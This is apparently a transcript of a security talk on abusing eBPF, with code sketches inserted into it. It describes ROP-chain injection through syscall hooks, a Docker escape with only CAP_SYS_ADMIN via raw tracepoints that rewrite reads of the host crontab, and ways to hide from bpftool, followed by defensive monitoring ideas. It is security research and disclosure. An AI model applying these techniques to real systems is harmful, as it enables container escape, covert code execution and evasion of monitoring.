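Here is a small userland illustration of that stack-scanning heuristic: given a candidate return address pulled off the stack, check whether the five bytes before it look like an x86-64 rel32 CALL (opcode 0xE8) and, if so, compute where that call went. A real implementation, running in eBPF via bpf_probe_read against the target's memory, would also need to handle indirect-call encodings and the PLT call-then-jump indirection described above; this snippet just demonstrates the check on its own return address.

```c
/* Heuristic: does a stack value look like a return address preceded by a
 * direct rel32 call, and if so, where did that call go? */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Returns the call target if *retaddr is preceded by "call rel32", else 0. */
static uintptr_t call_target_before(uintptr_t retaddr) {
    const uint8_t *p = (const uint8_t *)(retaddr - 5);
    if (p[0] != 0xE8)                      /* not a direct rel32 call */
        return 0;
    int32_t rel;
    memcpy(&rel, p + 1, sizeof(rel));
    return retaddr + rel;                  /* target = next-insn address + displacement */
}

__attribute__((noinline)) static void probe(void) {
    /* Use our own return address as a stand-in for a value skimmed
     * off a target process's stack. */
    uintptr_t ra = (uintptr_t)__builtin_return_address(0);
    uintptr_t target = call_target_before(ra);
    printf("return address %p looks %s\n", (void *)ra,
           target ? "like it was reached by a direct call"
                  : "indirect, PLT-style, or not a call site");
}

int main(void) {
    probe();
    return 0;
}
```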
After that, in both cases, you can just walk backwards as far as you can until you get page faults, which are essentially free for you and don't crash anything, and then you know where the memory region started. Then you can scan the data forwards and dump it all out until you again reach a page that isn't readable and writable. After that, you potentially generate your payload based off of this: you've dumped out all of the raw memory of the process, you know exactly where it sits, and you can attempt to find gadgets and build them into some generic payload that does whatever you want it to do. You just need to make sure there's a cleanup routine.

After that, we go back in with another hook, and we need to do the stack-skimming stuff again, because we need to find out where we were, so that when we write in the ROP payload this time, it's at the right place: when the syscall returns, the syscall stub will attempt to return back into user space and jump right into our ROP payload. Before we do this, though, we need to back up the memory from user space, because we're about to clobber all of it, and we need to return cleanly so the thing doesn't crash after our code runs. So we not only need to save the general stack space we're writing to, we also need to back up all the space we're potentially going to clobber as part of the ROP chain itself.

Then we write it in, we return, the ROP chain starts executing, and it does whatever its magic task is; that part's up to you. Then it starts its coordinated cleanup routine. What I like to do here is use one of those hooks on close to signal that the kernel side should write back most of the stack. Not all of it, because we have a couple of ROP gadgets we still need. As we do this, we actually write some new ROP gadgets past the end of the stack, and those help with our cleanup routine. The remaining ROP gadgets that are still there, the ones we haven't overwritten with the backed-up data, will execute once we return back to user space, and they exist simply to shift the stack pointer to where the new gadgets are, which weren't actually in what's considered the stack until we shifted the stack pointer. The new gadgets then exist to restore the backed-up data over the last gadgets we didn't overwrite, set a return value for the thing we actually hooked all the way back at the start, and shift the stack pointer back to where it needs to be. Then the code returns back into whatever actually called the original syscall wrapper in the first place, and everything's clean; it never knew what happened.

But there's a limitation on these kprobe, kretprobe, and tracepoint APIs: they all go through sysfs, a special mounted filesystem that does a lot of magic stuff on Linux; a lot of things live under it. Docker by default has an AppArmor profile that blocks access to this, and Docker also doesn't by default mount it as a fully writable mount, which you otherwise need for this kprobe tracing stuff.
However, eBPF actually has another type of tracing program that doesn't interact with sysfs at all, and there hasn't been all that much tooling built on it yet; even BCC, the main instrumentation framework, doesn't support these raw tracepoints. These are magic, and the process for setting them up is very complicated. Step one: you call the bpf(2) syscall with the BPF_RAW_TRACEPOINT_OPEN subcommand and you literally just give it the name of the registered tracepoint event you want to attach to. That's it. That's all it is. You also, of course, have a BPF program that you've loaded and you put that in there as well, but we've already done that before.

So Eminem once said, "and Moby, you can get stomped by Obie." Moby is the upstream open-source codebase that Docker is built from, and we're going to break out of it in a way that otherwise hasn't been demonstrated publicly, because everyone who's been showing Docker breakouts using BPF, without otherwise exploiting a kernel vulnerability, has basically turned off AppArmor to do it. We don't need to; we'll just leave it on. I don't care.

This is a slight modification of what we've been talking about, which is necessary because of how the raw tracepoints work. You can't actually trace arbitrary syscall events with them the way you can with kprobes; they'll probably add that in the future, they just only did it for regular tracepoints, not the raw tracepoints. What we can hook are these sort of primordial syscall events, sys_enter and sys_exit, which essentially get all of the same data anyway. It just means we need to reimplement the hooks: instead of having a separate BPF program for each function entry and return, we have one for the entry of all syscalls and one for the return of all syscalls, and we just switch on the syscall ID and handle each one differently. So we can write essentially all the same code, and it all just works. Even though we can't have a fancy DSL that hands us all the arguments as actual function parameters, they're all just in the registers anyway, and we get the register state: RDI, RSI, RDX, and so on, your standard AMD64 calling convention; those are the first few arguments passed to any syscall. So this is very easy.

The one thing you need to make sure to do is, again, save that state, because in the return we have absolutely zero context other than knowing the particular process ID and thread group ID again. In this particular case, we just serialize all of the register state and the syscall ID and shove it into the map. It's a hash map data type, so we don't have to use regular indexes from zero; we can just key it by the process ID and thread group ID, and everything's good. Then in the return, the first thing we do is check whether we even have state associated with us, because if we don't, we didn't attempt to do anything at the entry, we don't care about the return, and we just bail out and let the syscall happen. But if it's something we want to be dealing with, we start processing again, with another switch on the syscall ID, and then we potentially process the data.
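Here is a hedged sketch of that raw-tracepoint approach: one program on sys_enter and one on sys_exit, each switching on the syscall number, with state keyed by pid and tgid in a hash map. For sys_enter, args[0] points at the saved register state and args[1] carries the syscall ID; the registers are pulled over with bpf_probe_read. The syscall numbers, state layout, and names here are placeholders.

```c
/* Raw tracepoint sketch: hook all syscall entries/exits and switch on the
 * syscall ID, saving register state keyed by pid_tgid. */
#include <linux/bpf.h>
#include <linux/ptrace.h>
#include "bpf_helpers.h"

#define NR_WRITE 1   /* x86-64 syscall numbers, for illustration */
#define NR_CLOSE 3

struct sys_state {
    __u64 id;
    struct pt_regs regs;   /* userland register snapshot at entry */
};

struct bpf_map_def SEC("maps") inflight = {
    .type        = BPF_MAP_TYPE_HASH,
    .key_size    = sizeof(__u64),
    .value_size  = sizeof(struct sys_state),
    .max_entries = 1024,
};

SEC("raw_tracepoint/sys_enter")
int on_sys_enter(struct bpf_raw_tracepoint_args *ctx)
{
    __u64 key = bpf_get_current_pid_tgid();
    struct sys_state st = {};
    st.id = ctx->args[1];

    switch (st.id) {
    case NR_WRITE:
    case NR_CLOSE:
        /* args[0] points at the saved registers for this syscall. */
        bpf_probe_read(&st.regs, sizeof(st.regs), (void *)ctx->args[0]);
        bpf_map_update_elem(&inflight, &key, &st, BPF_ANY);
        break;
    default:
        break;  /* not a syscall we care about */
    }
    return 0;
}

SEC("raw_tracepoint/sys_exit")
int on_sys_exit(struct bpf_raw_tracepoint_args *ctx)
{
    __u64 key = bpf_get_current_pid_tgid();
    struct sys_state *st = bpf_map_lookup_elem(&inflight, &key);
    if (!st)
        return 0;   /* nothing stashed at entry, let the syscall go */

    /* A second switch on st->id would do the post-syscall rewriting here. */
    bpf_map_delete_elem(&inflight, &key);
    return 0;
}

char _license[] SEC("license") = "GPL";
```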
In my example here, I'm doing basically the same sort of thing using the syscall hooking stuff. I'm not writing into memory to do a ROP chain; I'm just overwriting file I/O without things realizing it. In this particular case, I've started up a Docker container. The only thing I've added to it is the CAP_SYS_ADMIN capability; that's it, I haven't turned off AppArmor. I've got a binary in there with a payload, and I'm about to run it. I'm going to cat a file that otherwise doesn't exist, and mind you, I'm catting it on the outside. What this payload does is override crontab whenever anything tries to read it. So we load our code, and now when we try to load crontab, we have our own code in the top-level crontab of the host, outside of the Docker container. Now we just wait a little bit for cron on the system to pick it up and start executing our code, and then we've completely, successfully broken out of the Docker container using nothing but CAP_SYS_ADMIN. We haven't turned off any of the actual security mechanisms; we just gave a regular privilege that people grant whenever they're going to do fancy BPF stuff, and we've broken out. We're done. We've escaped.

So what can we do to defend against this stuff? You could remove or blacklist the bpf(2) syscall entirely. Docker sort of tries to do this when it's unprivileged, but the moment you add CAP_SYS_ADMIN, it dynamically updates its seccomp-BPF syscall filter to allow it back in, because you need it to do stuff. Unfortunately that's not going to work, because modern Linux systems increasingly rely on BPF; systemd relies on it, so if you're init, you don't want init to crash right at the beginning of boot because you've decided to mess around with your kernel. That would be bad.

So you really need to be prepared for what someone can do when they have access. You can actually log all of these BPF programs, using the same API we used to pull out the sizes of the maps: if you're privileged, you can dump out the contents of the maps, and you can dump out all of the code of the programs when they're loaded. bpftool is a utility that does this, and it's very simple. Unfortunately, because it also uses the bpf(2) syscall, it's susceptible too: if someone's got one of those kprobes in there, they can start overwriting the response data, lie to it, and hide what's actually going on. So once it's in there, it's still kind of game over.

But we can actually use tracing ourselves to see things that might be bad. We can look for eBPF maps being transferred between processes, for eBPF maps that aren't actually associated with eBPF programs, and for eBPF programs being sent between processes. I didn't talk about that last one too much, because it's one-to-one: every time you want to send a new message, you have to send a new file descriptor over. I'd rather have a one-time setup, like in the tail-call example, where we just send a couple of maps over and then no one sends any magic file descriptors to each other; they just magically appear and start executing. It's much sneakier.
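As one building block for that kind of monitoring, here is a hedged sketch of enumerating every loaded eBPF program via the bpf(2) introspection commands mentioned above (the same ones bpftool wraps). It needs privileges, and as just noted, a resident implant hooking bpf(2) can still lie to it.

```c
/* Defensive sketch: walk all loaded BPF programs with
 * BPF_PROG_GET_NEXT_ID / BPF_PROG_GET_FD_BY_ID / BPF_OBJ_GET_INFO_BY_FD. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

static long bpf(int cmd, union bpf_attr *attr) {
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

int main(void) {
    __u32 id = 0;

    for (;;) {
        union bpf_attr attr;

        memset(&attr, 0, sizeof(attr));
        attr.start_id = id;
        if (bpf(BPF_PROG_GET_NEXT_ID, &attr) < 0)
            break;                      /* no more programs */
        id = attr.next_id;

        memset(&attr, 0, sizeof(attr));
        attr.prog_id = id;
        int fd = bpf(BPF_PROG_GET_FD_BY_ID, &attr);
        if (fd < 0)
            continue;

        struct bpf_prog_info info;
        memset(&info, 0, sizeof(info));
        memset(&attr, 0, sizeof(attr));
        attr.info.bpf_fd   = fd;
        attr.info.info_len = sizeof(info);
        attr.info.info     = (__u64)(unsigned long)&info;
        if (bpf(BPF_OBJ_GET_INFO_BY_FD, &attr) == 0)
            printf("prog id %u type %u name %.16s\n",
                   info.id, info.type, info.name);
        close(fd);
    }
    return 0;
}
```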
But you could also do it the other way around. You can also look for unexpected eBPF programs being attached to things they shouldn't be, and for unexpected eBPF tracing programs being added; that's probably a sign something bad is going on. Honestly, though, it's unclear how much more common these operations will get, so they may not be the anomalies in the near future that they are now.

The more APIs we have, the more problems we have, because there's more chicanery people can do with them. Even the unprivileged APIs can enable really screwy behaviors to evade people who are trying to see what's happening on a system, and once you get privileged eBPF, it's basically impossible to stop. Honestly, a good number of these APIs really shouldn't require these privileges in the first place. There is work being done to change this, but you shouldn't have to require CAP_SYS_ADMIN for a lot of things that really don't need it, because a lot of them are essentially analogous to raw packet I/O. And if you do require it, that makes those programs a softer target, because they then need to be less and less sandboxed to work properly, given all the stuff that gets layered on here. I'm personally waiting for a special eBPF map type that lets us generically pass file descriptors across processes, but I doubt that one's going to happen.

I'd like to thank Andy and JKF for the help with a lot of this research. A wise man once said you can't hide secrets from the future using math. I think a simpler version of this that also holds true is that you simply can't hide from the future. I don't have time for questions, but I'd be happy to talk about all this stuff, and other research we're doing at NCC Group, somewhere else; feel free to find me. I'm also on Twitter, happy to talk. Thank you.